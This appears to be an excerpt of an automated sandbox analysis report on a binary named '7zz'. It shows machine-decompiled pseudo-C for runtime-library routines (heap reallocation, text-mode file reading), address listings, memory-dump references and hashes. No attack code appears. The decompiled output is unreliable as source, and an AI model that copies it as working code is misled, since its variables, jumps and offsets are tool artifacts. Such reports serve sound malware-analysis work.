									if(_t89 != _t113) {
										_t91 =  *((intOrPtr*)(_t97 - 4)) - 1;
										_v36 = _t91;
										__eflags = _t91 - _t116;
										if(_t91 >= _t116) {
											_t91 = _t116;
										}
										E0046C5C0(_v40, _t97, _t91);
										_t93 = L0046EB0B(_t97);
										_v44 = _t93;
										_push(_t97);
										_push(_t93);
										L0046EB36();
										_t123 = _t123 + 0x18;
									}
								} else {
									_v40 = _t97;
								}
							}
							__eflags = _v40 - _t113;
							if(_v40 == _t113) {
								__eflags = _t116 - _t113;
								if(_t116 == _t113) {
									_t116 = 1;
									_a8 = _t116;
								}
								_t116 = _t116 + 0x0000000f & 0xfffffff0;
								_a8 = _t116;
								_t83 = HeapAlloc( *0x496580, _t113, _t116);
								_v40 = _t83;
								__eflags = _t83 - _t113;
								if(_t83 != _t113) {
									_t85 =  *((intOrPtr*)(_t97 - 4)) - 1;
									_v36 = _t85;
									__eflags = _t85 - _t116;
									if(_t85 >= _t116) {
										_t85 = _t116;
									}
									E0046C5C0(_v40, _t97, _t85);
									_push(_t97);
									_push(_v44);
									L0046EB36();
									_t123 = _t123 + 0x14;
								}
							}
							goto L21;
							L27:
							_t78 = L0046E8D6(_t116);
							__eflags = _t78;
						} while (_t78 != 0);
						goto L63;
					} else {
						E0046C0FF(_t97);
						L63:
						_t57 = 0;
						__eflags = 0;
						goto L64;
					}
				} else {
					_t57 = L0046BFC5(_a8);
					L64:
					 *[fs:0x0] = _v20;
					return _t57;
				}
			}




































                                                                                                                                    0x0046c94d
                                                                                                                                    0x0046c94f
                                                                                                                                    0x0046c954
                                                                                                                                    0x0046c95f
                                                                                                                                    0x0046c960
                                                                                                                                    0x0046c967
                                                                                                                                    0x0046c96d
                                                                                                                                    0x0046c970
                                                                                                                                    0x0046c974
                                                                                                                                    0x0046c984
                                                                                                                                    0x0046c987
                                                                                                                                    0x0046c989
                                                                                                                                    0x0046c997
                                                                                                                                    0x0046c99c
                                                                                                                                    0x0046c99f
                                                                                                                                    0x0046cade
                                                                                                                                    0x0046cae1
                                                                                                                                    0x0046cc2e
                                                                                                                                    0x0046cc2e
                                                                                                                                    0x0046cc30
                                                                                                                                    0x0046cc33
                                                                                                                                    0x0046cc35
                                                                                                                                    0x0046cc37
                                                                                                                                    0x0046cc3b
                                                                                                                                    0x0046cc3b
                                                                                                                                    0x0046cc3f
                                                                                                                                    0x0046cc3f
                                                                                                                                    0x0046cc4b
                                                                                                                                    0x0046cc4b
                                                                                                                                    0x0046cc51
                                                                                                                                    0x0046cc53
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046cc55
                                                                                                                                    0x0046cc5b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046cc5e
                                                                                                                                    0x0046cc64
                                                                                                                                    0x0046cc66
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046cc66
                                                                                                                                    0x00000000
                                                                                                                                    0x0046cc2e
                                                                                                                                    0x0046cae7
                                                                                                                                    0x0046caea
                                                                                                                                    0x0046caec
                                                                                                                                    0x0046caee
                                                                                                                                    0x0046cafa
                                                                                                                                    0x0046caf0
                                                                                                                                    0x0046caf3
                                                                                                                                    0x0046caf3
                                                                                                                                    0x0046cafb
                                                                                                                                    0x0046cafb
                                                                                                                                    0x0046cafe
                                                                                                                                    0x0046cafe
                                                                                                                                    0x0046cb01
                                                                                                                                    0x0046cb04
                                                                                                                                    0x0046cb0c
                                                                                                                                    0x0046cb11
                                                                                                                                    0x0046cb12
                                                                                                                                    0x0046cb22
                                                                                                                                    0x0046cb27
                                                                                                                                    0x0046cb2a
                                                                                                                                    0x0046cb2c
                                                                                                                                    0x0046cb2f
                                                                                                                                    0x0046cb31
                                                                                                                                    0x0046cbf1
                                                                                                                                    0x0046cb37
                                                                                                                                    0x0046cb37
                                                                                                                                    0x0046cb3d
                                                                                                                                    0x0046cb41
                                                                                                                                    0x0046cb4c
                                                                                                                                    0x0046cb51
                                                                                                                                    0x0046cb54
                                                                                                                                    0x0046cb56
                                                                                                                                    0x0046cb61
                                                                                                                                    0x0046cb67
                                                                                                                                    0x0046cb6a
                                                                                                                                    0x0046cb6c
                                                                                                                                    0x0046cb71
                                                                                                                                    0x0046cb74
                                                                                                                                    0x0046cb77
                                                                                                                                    0x0046cb79
                                                                                                                                    0x0046cb7b
                                                                                                                                    0x0046cb7b
                                                                                                                                    0x0046cb84
                                                                                                                                    0x0046cb90
                                                                                                                                    0x0046cb95
                                                                                                                                    0x0046cb95
                                                                                                                                    0x0046cb58
                                                                                                                                    0x0046cb5b
                                                                                                                                    0x0046cb5b
                                                                                                                                    0x0046cb98
                                                                                                                                    0x0046cb98
                                                                                                                                    0x0046cb9b
                                                                                                                                    0x0046cb9f
                                                                                                                                    0x0046cbaa
                                                                                                                                    0x0046cbb0
                                                                                                                                    0x0046cbb3
                                                                                                                                    0x0046cbb5
                                                                                                                                    0x0046cbba
                                                                                                                                    0x0046cbbd
                                                                                                                                    0x0046cbc0
                                                                                                                                    0x0046cbc2
                                                                                                                                    0x0046cbc4
                                                                                                                                    0x0046cbc4
                                                                                                                                    0x0046cbcb
                                                                                                                                    0x0046cbd7
                                                                                                                                    0x0046cbdc
                                                                                                                                    0x0046cbdc
                                                                                                                                    0x0046cbb5
                                                                                                                                    0x0046cb9f
                                                                                                                                    0x0046cbf4
                                                                                                                                    0x0046cbf4
                                                                                                                                    0x0046cbf4
                                                                                                                                    0x0046cbf8
                                                                                                                                    0x0046cbf8
                                                                                                                                    0x0046cbfd
                                                                                                                                    0x0046cc00
                                                                                                                                    0x0046cc02
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046cc04
                                                                                                                                    0x0046cc0a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046cc0d
                                                                                                                                    0x0046cc13
                                                                                                                                    0x0046cc15
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046cc1b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046c9a5
                                                                                                                                    0x0046c9a5
                                                                                                                                    0x0046c9a5
                                                                                                                                    0x0046c9a8
                                                                                                                                    0x0046c9ab
                                                                                                                                    0x0046caa2
                                                                                                                                    0x0046caa2
                                                                                                                                    0x0046caa5
                                                                                                                                    0x0046caa7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046caad
                                                                                                                                    0x0046cab3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046cab3
                                                                                                                                    0x0046c9b3
                                                                                                                                    0x0046c9b9
                                                                                                                                    0x0046c9bd
                                                                                                                                    0x0046c9c3
                                                                                                                                    0x0046c9c6
                                                                                                                                    0x0046c9c8
                                                                                                                                    0x0046ca72
                                                                                                                                    0x0046ca72
                                                                                                                                    0x0046ca76
                                                                                                                                    0x0046ca7b
                                                                                                                                    0x0046ca7e
                                                                                                                                    0x0046ca80
                                                                                                                                    0x0046ca82
                                                                                                                                    0x0046ca86
                                                                                                                                    0x0046ca86
                                                                                                                                    0x0046ca8a
                                                                                                                                    0x0046ca8a
                                                                                                                                    0x0046ca8d
                                                                                                                                    0x0046ca9f
                                                                                                                                    0x0046ca9f
                                                                                                                                    0x00000000
                                                                                                                                    0x0046ca7e
                                                                                                                                    0x0046c9ce
                                                                                                                                    0x0046c9d4
                                                                                                                                    0x0046c9d6
                                                                                                                                    0x0046c9d7
                                                                                                                                    0x0046c9d8
                                                                                                                                    0x0046c9d9
                                                                                                                                    0x0046c9de
                                                                                                                                    0x0046c9e1
                                                                                                                                    0x0046c9e3
                                                                                                                                    0x0046c9ea
                                                                                                                                    0x0046c9eb
                                                                                                                                    0x0046c9f1
                                                                                                                                    0x0046c9f4
                                                                                                                                    0x0046c9f6
                                                                                                                                    0x0046c9fb
                                                                                                                                    0x0046c9fc
                                                                                                                                    0x0046c9ff
                                                                                                                                    0x0046ca01
                                                                                                                                    0x0046ca03
                                                                                                                                    0x0046ca03
                                                                                                                                    0x0046ca0a
                                                                                                                                    0x0046ca10
                                                                                                                                    0x0046ca15
                                                                                                                                    0x0046ca18
                                                                                                                                    0x0046ca19
                                                                                                                                    0x0046ca1a
                                                                                                                                    0x0046ca1f
                                                                                                                                    0x0046ca1f
                                                                                                                                    0x0046c9e5
                                                                                                                                    0x0046c9e5
                                                                                                                                    0x0046c9e5
                                                                                                                                    0x0046c9e3
                                                                                                                                    0x0046ca22
                                                                                                                                    0x0046ca25
                                                                                                                                    0x0046ca27
                                                                                                                                    0x0046ca29
                                                                                                                                    0x0046ca2d
                                                                                                                                    0x0046ca2e
                                                                                                                                    0x0046ca2e
                                                                                                                                    0x0046ca34
                                                                                                                                    0x0046ca37
                                                                                                                                    0x0046ca42
                                                                                                                                    0x0046ca48
                                                                                                                                    0x0046ca4b
                                                                                                                                    0x0046ca4d
                                                                                                                                    0x0046ca52
                                                                                                                                    0x0046ca53
                                                                                                                                    0x0046ca56
                                                                                                                                    0x0046ca58
                                                                                                                                    0x0046ca5a
                                                                                                                                    0x0046ca5a
                                                                                                                                    0x0046ca61
                                                                                                                                    0x0046ca66
                                                                                                                                    0x0046ca67
                                                                                                                                    0x0046ca6a
                                                                                                                                    0x0046ca6f
                                                                                                                                    0x0046ca6f
                                                                                                                                    0x0046ca4d
                                                                                                                                    0x00000000
                                                                                                                                    0x0046cab9
                                                                                                                                    0x0046caba
                                                                                                                                    0x0046cac0
                                                                                                                                    0x0046cac0
                                                                                                                                    0x00000000
                                                                                                                                    0x0046c98b
                                                                                                                                    0x0046c98c
                                                                                                                                    0x0046cc68
                                                                                                                                    0x0046cc68
                                                                                                                                    0x0046cc68
                                                                                                                                    0x00000000
                                                                                                                                    0x0046cc68
                                                                                                                                    0x0046c976
                                                                                                                                    0x0046c979
                                                                                                                                    0x0046cc6a
                                                                                                                                    0x0046cc6d
                                                                                                                                    0x0046cc78
                                                                                                                                    0x0046cc78

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5e690445b6b585e209e2953b3172029bcb4d9e8e3f1a6ac8c75fed4a3d9b4df3
                                                                                                                                    • Instruction ID: 17e87dca6aaccdebba4e5c35270bbda758384f6f49e70602d0c86d8a415a7f21
                                                                                                                                    • Opcode Fuzzy Hash: 5e690445b6b585e209e2953b3172029bcb4d9e8e3f1a6ac8c75fed4a3d9b4df3
                                                                                                                                    • Instruction Fuzzy Hash: 459109B1D00118ABDB21EB65DCC5ABE7BB4EB45764F200127F899B6290F7398D40C76E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0047143F Relevance: 6.2, APIs: 4, Instructions: 170fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0047143F(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t75;
				void* _t78;
				intOrPtr _t82;
				signed char _t83;
				signed char _t85;
				long _t86;
				void* _t88;
				signed char _t90;
				signed char _t91;
				signed int _t95;
				intOrPtr _t96;
				char _t98;
				signed int _t99;
				long _t101;
				long _t102;
				signed int _t103;
				intOrPtr _t106;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed char _t112;
				signed char* _t113;
				long _t115;
				void* _t119;
				signed int _t120;
				intOrPtr* _t121;
				signed int _t123;
				signed char* _t124;
				void* _t125;
				void* _t126;

				_v12 = _v12 & 0x00000000;
				_t108 = _a8;
				_t119 = _t108;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t75 = _a4;
				_t111 = _t75 >> 5;
				_t121 = 0x496460 + _t111 * 4;
				_t123 = (_t75 & 0x0000001f) + (_t75 & 0x0000001f) * 8 << 2;
				_t78 =  *((intOrPtr*)(0x496460 + _t111 * 4)) + _t123;
				_t112 =  *((intOrPtr*)(_t78 + 4));
				if((_t112 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t112 & 0x00000048) != 0) {
					_t106 =  *((intOrPtr*)(_t78 + 5));
					if(_t106 != 0xa) {
						_a12 = _a12 - 1;
						 *_t108 = _t106;
						_t20 = _t108 + 1; // 0x4
						_t119 = _t20;
						_v12 = 1;
						 *((char*)( *_t121 + _t123 + 5)) = 0xa;
					}
				}
				if(ReadFile( *( *_t121 + _t123), _t119, _a12,  &_v16, 0) != 0) {
					_t82 =  *_t121;
					_t120 = _v16;
					_v12 = _v12 + _t120;
					_t31 = _t123 + 4; // 0x4
					_t113 = _t82 + _t31;
					_t83 =  *((intOrPtr*)(_t82 + _t123 + 4));
					__eflags = _t83 & 0x00000080;
					if((_t83 & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t120;
					if(_t120 == 0) {
						L15:
						_t85 = _t83 & 0x000000fb;
						__eflags = _t85;
						L16:
						 *_t113 = _t85;
						_t86 = _a8;
						_a12 = _t86;
						_t115 = _v12 + _t86;
						__eflags = _t86 - _t115;
						_v12 = _t115;
						if(_t86 >= _t115) {
							L40:
							_t109 = _t108 - _a8;
							__eflags = _t109;
							_v12 = _t109;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t88 =  *_a12;
							__eflags = _t88 - 0x1a;
							if(_t88 == 0x1a) {
								break;
							}
							__eflags = _t88 - 0xd;
							if(_t88 == 0xd) {
								__eflags = _a12 - _t115 - 1;
								if(_a12 >= _t115 - 1) {
									_a12 = _a12 + 1;
									_t95 = ReadFile( *( *_t121 + _t123),  &_v5, 1,  &_v16, 0);
									__eflags = _t95;
									if(_t95 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t108 = 0xd;
											L35:
											_t108 = _t108 + 1;
											__eflags = _t108;
											L36:
											_t115 = _v12;
											__eflags = _a12 - _t115;
											if(_a12 < _t115) {
												continue;
											}
											goto L40;
										}
										_t96 =  *_t121;
										__eflags =  *(_t96 + _t123 + 4) & 0x00000048;
										if(( *(_t96 + _t123 + 4) & 0x00000048) == 0) {
											__eflags = _t108 - _a8;
											if(__eflags != 0) {
												L33:
												E004716C1(__eflags, _a4, 0xffffffff, 1);
												_t126 = _t126 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t108 = 0xa;
											goto L35;
										}
										_t98 = _v5;
										__eflags = _t98 - 0xa;
										if(_t98 == 0xa) {
											goto L32;
										}
										 *_t108 = 0xd;
										_t108 = _t108 + 1;
										 *((char*)( *_t121 + _t123 + 5)) = _t98;
										goto L36;
									}
									_t99 = GetLastError();
									__eflags = _t99;
									if(_t99 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t101 = _a12 + 1;
								__eflags =  *_t101 - 0xa;
								if( *_t101 != 0xa) {
									 *_t108 = 0xd;
									_t108 = _t108 + 1;
									_a12 = _t101;
									goto L36;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t108 = _t88;
							_t108 = _t108 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t124 =  *_t121 + _t123 + 4;
						_t90 =  *_t124;
						__eflags = _t90 & 0x00000040;
						if((_t90 & 0x00000040) == 0) {
							_t91 = _t90 | 0x00000002;
							__eflags = _t91;
							 *_t124 = _t91;
						}
						goto L40;
					}
					__eflags =  *_t108 - 0xa;
					if( *_t108 != 0xa) {
						goto L15;
					}
					_t85 = _t83 | 0x00000004;
					goto L16;
				}
				_t102 = GetLastError();
				_t125 = 5;
				if(_t102 != _t125) {
					__eflags = _t102 - 0x6d;
					if(_t102 == 0x6d) {
						goto L42;
					}
					_t103 = E004705D3(_t102);
					L10:
					return _t103 | 0xffffffff;
				}
				 *((intOrPtr*)(E00470646())) = 9;
				_t103 = E0047064F();
				 *_t103 = _t125;
				goto L10;
			}




































                                                                                                                                    0x00471445
                                                                                                                                    0x0047144e
                                                                                                                                    0x00471453
                                                                                                                                    0x00471455
                                                                                                                                    0x00471611
                                                                                                                                    0x00471611
                                                                                                                                    0x00000000
                                                                                                                                    0x00471611
                                                                                                                                    0x0047145b
                                                                                                                                    0x00471463
                                                                                                                                    0x00471470
                                                                                                                                    0x00471477
                                                                                                                                    0x0047147a
                                                                                                                                    0x0047147c
                                                                                                                                    0x00471482
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0047148b
                                                                                                                                    0x0047148d
                                                                                                                                    0x00471492
                                                                                                                                    0x00471494
                                                                                                                                    0x00471497
                                                                                                                                    0x0047149b
                                                                                                                                    0x0047149b
                                                                                                                                    0x0047149e
                                                                                                                                    0x004714a5
                                                                                                                                    0x004714a5
                                                                                                                                    0x00471492
                                                                                                                                    0x004714c1
                                                                                                                                    0x004714fc
                                                                                                                                    0x004714fe
                                                                                                                                    0x00471501
                                                                                                                                    0x00471504
                                                                                                                                    0x00471504
                                                                                                                                    0x00471508
                                                                                                                                    0x0047150c
                                                                                                                                    0x0047150e
                                                                                                                                    0x0047160c
                                                                                                                                    0x00000000
                                                                                                                                    0x0047160c
                                                                                                                                    0x00471514
                                                                                                                                    0x00471516
                                                                                                                                    0x00471521
                                                                                                                                    0x00471521
                                                                                                                                    0x00471521
                                                                                                                                    0x00471523
                                                                                                                                    0x00471523
                                                                                                                                    0x00471525
                                                                                                                                    0x0047152b
                                                                                                                                    0x0047152e
                                                                                                                                    0x00471530
                                                                                                                                    0x00471532
                                                                                                                                    0x00471535
                                                                                                                                    0x00471606
                                                                                                                                    0x00471606
                                                                                                                                    0x00471606
                                                                                                                                    0x00471609
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0047153b
                                                                                                                                    0x0047153b
                                                                                                                                    0x0047153e
                                                                                                                                    0x00471540
                                                                                                                                    0x00471542
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00471548
                                                                                                                                    0x0047154a
                                                                                                                                    0x00471558
                                                                                                                                    0x0047155b
                                                                                                                                    0x0047157b
                                                                                                                                    0x00471589
                                                                                                                                    0x0047158f
                                                                                                                                    0x00471591
                                                                                                                                    0x0047159d
                                                                                                                                    0x0047159d
                                                                                                                                    0x004715a1
                                                                                                                                    0x004715e4
                                                                                                                                    0x004715e4
                                                                                                                                    0x004715e7
                                                                                                                                    0x004715e7
                                                                                                                                    0x004715e7
                                                                                                                                    0x004715e8
                                                                                                                                    0x004715e8
                                                                                                                                    0x004715eb
                                                                                                                                    0x004715ee
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004715f4
                                                                                                                                    0x004715a3
                                                                                                                                    0x004715a5
                                                                                                                                    0x004715aa
                                                                                                                                    0x004715bf
                                                                                                                                    0x004715c2
                                                                                                                                    0x004715cf
                                                                                                                                    0x004715d6
                                                                                                                                    0x004715db
                                                                                                                                    0x004715de
                                                                                                                                    0x004715e2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004715e2
                                                                                                                                    0x004715c4
                                                                                                                                    0x004715c8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004715ca
                                                                                                                                    0x004715ca
                                                                                                                                    0x00000000
                                                                                                                                    0x004715ca
                                                                                                                                    0x004715ac
                                                                                                                                    0x004715af
                                                                                                                                    0x004715b1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004715b3
                                                                                                                                    0x004715b8
                                                                                                                                    0x004715b9
                                                                                                                                    0x00000000
                                                                                                                                    0x004715b9
                                                                                                                                    0x00471593
                                                                                                                                    0x00471599
                                                                                                                                    0x0047159b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0047159b
                                                                                                                                    0x00471560
                                                                                                                                    0x00471561
                                                                                                                                    0x00471564
                                                                                                                                    0x0047156c
                                                                                                                                    0x0047156f
                                                                                                                                    0x00471570
                                                                                                                                    0x00000000
                                                                                                                                    0x00471570
                                                                                                                                    0x00471566
                                                                                                                                    0x00000000
                                                                                                                                    0x00471566
                                                                                                                                    0x0047154c
                                                                                                                                    0x0047154e
                                                                                                                                    0x0047154f
                                                                                                                                    0x00000000
                                                                                                                                    0x0047154f
                                                                                                                                    0x004715f8
                                                                                                                                    0x004715fc
                                                                                                                                    0x004715fe
                                                                                                                                    0x00471600
                                                                                                                                    0x00471602
                                                                                                                                    0x00471602
                                                                                                                                    0x00471604
                                                                                                                                    0x00471604
                                                                                                                                    0x00000000
                                                                                                                                    0x00471600
                                                                                                                                    0x00471518
                                                                                                                                    0x0047151b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0047151d
                                                                                                                                    0x00000000
                                                                                                                                    0x0047151d
                                                                                                                                    0x004714c3
                                                                                                                                    0x004714cb
                                                                                                                                    0x004714ce
                                                                                                                                    0x004714e4
                                                                                                                                    0x004714e7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004714ee
                                                                                                                                    0x004714f4
                                                                                                                                    0x00000000
                                                                                                                                    0x004714f4
                                                                                                                                    0x004714d5
                                                                                                                                    0x004714db
                                                                                                                                    0x004714e0
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • ReadFile.KERNEL32(00000003,00000003,00000000,00000003,00000000,?,00000002,00000000), ref: 004714B9
                                                                                                                                    • GetLastError.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,Function_00007CCD), ref: 004714C3
                                                                                                                                    • ReadFile.KERNEL32(?,?,00000001,00000003,00000000,?,00000002,00000000), ref: 00471589
                                                                                                                                    • GetLastError.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,Function_00007CCD), ref: 00471593
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorFileLastRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1948546556-0
                                                                                                                                    • Opcode ID: 624ec795883e0c2137594efc4a7571c2dcd972e7bb4f4fe6413c1de08f5d7430
                                                                                                                                    • Instruction ID: 3acba76942d2db7199ab0c4a203b8ba3d5a06c5b05a066009057d9eb64363bcb
                                                                                                                                    • Opcode Fuzzy Hash: 624ec795883e0c2137594efc4a7571c2dcd972e7bb4f4fe6413c1de08f5d7430
                                                                                                                                    • Instruction Fuzzy Hash: 5251D774A04285AFDF258FACC884BEA7BF0AF42304F14C49BE45A8B361D378D955CB59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0042D5F3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 189COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                    			E0042D5F3(void* __ecx, signed int __edx) {
				intOrPtr _t110;
				intOrPtr _t117;
				intOrPtr* _t118;
				void* _t122;
				signed int _t128;
				signed int _t132;
				signed int _t135;
				signed int _t139;
				intOrPtr _t148;
				signed int _t173;
				intOrPtr _t174;
				intOrPtr _t176;
				void* _t177;
				signed int _t178;
				void* _t179;
				signed int* _t182;
				void* _t184;
				void* _t186;
				void* _t187;

				_t173 = __edx;
				L0046B890(0x4774e4, _t187);
				_t184 = __ecx;
				_t110 = E0042D241(__edx);
				_t148 =  *((intOrPtr*)(_t187 + 8));
				_t176 = _t110;
				E0040862D();
				E0040867E(_t148, _t176);
				 *(_t187 - 0x10) =  *(_t187 - 0x10) & 0x00000000;
				 *(_t187 - 0x1c) =  *(_t187 - 0x1c) & 0x00000000;
				if(_t176 <= 0) {
					L15:
					_t177 = _t148 + 0x14;
					 *((intOrPtr*)(_t187 + 8)) =  *(_t187 - 0x1c) - 1;
					E0040862D();
					_t155 = _t177;
					E0040867E(_t177,  *((intOrPtr*)(_t187 + 8)));
					_t117 =  *((intOrPtr*)(_t187 + 8));
					if(_t117 <= 0) {
						L18:
						_t178 =  *(_t187 - 0x10);
						if(_t178 <  *((intOrPtr*)(_t187 + 8))) {
							E0042D0F8(_t155);
						}
						_t179 = _t178 -  *((intOrPtr*)(_t187 + 8));
						_t156 = _t148 + 0x28;
						 *((intOrPtr*)(_t187 + 8)) = _t156;
						_t118 = E0040867E(_t156, _t179);
						if(_t179 != 1) {
							if(_t179 <= 0) {
								goto L36;
							} else {
								goto L35;
							}
							do {
								L35:
								_t118 = E00415C6D( *((intOrPtr*)(_t187 + 8)), E0042D241(_t173));
								_t179 = _t179 - 1;
							} while (_t179 != 0);
							goto L36;
						} else {
							_t186 = 0;
							if( *(_t187 - 0x10) <= 0) {
								L32:
								if( *((intOrPtr*)(_t148 + 0x30)) != 1) {
									_t118 = E0042D0F8(_t156);
								}
								L36:
								 *[fs:0x0] =  *((intOrPtr*)(_t187 - 0xc));
								return _t118;
							}
							_t174 =  *((intOrPtr*)(_t148 + 0x1c));
							do {
								if(_t174 <= 0) {
									L27:
									_t156 = 0xffffffff;
									L28:
									if(_t156 < 0) {
										_t156 =  *((intOrPtr*)(_t187 + 8));
										_t118 = E00415C6D( *((intOrPtr*)(_t187 + 8)), _t186);
										goto L32;
									}
									goto L29;
								}
								_t118 =  *((intOrPtr*)(_t148 + 0x20));
								while( *_t118 != _t186) {
									_t156 = 1;
									_t118 = _t118 + 8;
									if(1 < _t174) {
										continue;
									}
									goto L27;
								}
								goto L28;
								L29:
								_t186 = _t186 + 1;
							} while (_t186 <  *(_t187 - 0x10));
							goto L32;
						}
					}
					 *((intOrPtr*)(_t187 - 0x24)) = _t117;
					do {
						 *(_t187 - 0x2c) = E0042D241(_t173);
						_t122 = E0042D241(_t173);
						_t155 = _t177;
						L0042389F(_t177,  *(_t187 - 0x2c), _t122);
						_t92 = _t187 - 0x24;
						 *_t92 =  *((intOrPtr*)(_t187 - 0x24)) - 1;
					} while ( *_t92 != 0);
					goto L18;
				}
				 *((intOrPtr*)(_t187 - 0x24)) = _t176;
				do {
					 *(_t187 - 0x50) =  *(_t187 - 0x50) & 0x00000000;
					 *(_t187 - 0x4c) =  *(_t187 - 0x4c) & 0x00000000;
					 *((intOrPtr*)(_t187 - 0x54)) = 0x47a7ec;
					 *(_t187 - 4) =  *(_t187 - 4) & 0x00000000;
					_push(_t187 - 0x5c);
					E00428C94(_t148);
					 *(_t187 - 4) =  *(_t187 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t187 - 0x54)) = 0x47a7ec;
					E00407A18( *(_t187 - 0x4c));
					_t182 =  *( *((intOrPtr*)(_t148 + 0xc)) +  *(_t148 + 8) * 4 - 4);
					_t128 = E0042D110( *((intOrPtr*)(_t184 + 0x18)));
					_t167 =  *((intOrPtr*)(_t184 + 0x18));
					 *(_t187 + 0xb) = _t128;
					 *(_t187 - 0x14) = _t128 & 0x0000000f;
